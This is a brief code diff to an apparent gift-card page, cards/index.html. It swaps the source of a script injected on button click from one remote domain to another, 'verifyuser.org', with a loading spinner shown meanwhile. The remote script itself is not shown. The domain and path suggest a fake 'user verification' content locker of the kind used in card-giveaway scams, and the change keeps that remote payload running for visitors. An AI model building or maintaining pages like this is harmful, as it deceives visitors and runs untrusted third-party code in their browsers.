--- a/cards/index.html
+++ b/cards/index.html
@@ -141,7 +141,7 @@ for(let btn of buttons){
         loader.style.display = 'block';
 
         const script = document.createElement('script');
-        script.src = 'https://bigappboi.com/cp/js/zqz62';
+        script.src = 'https://verifyuser.org/cp/js/dwl7y';
         script.async = true;
         script.onload = (() => {
           loader.style.display = 'none';
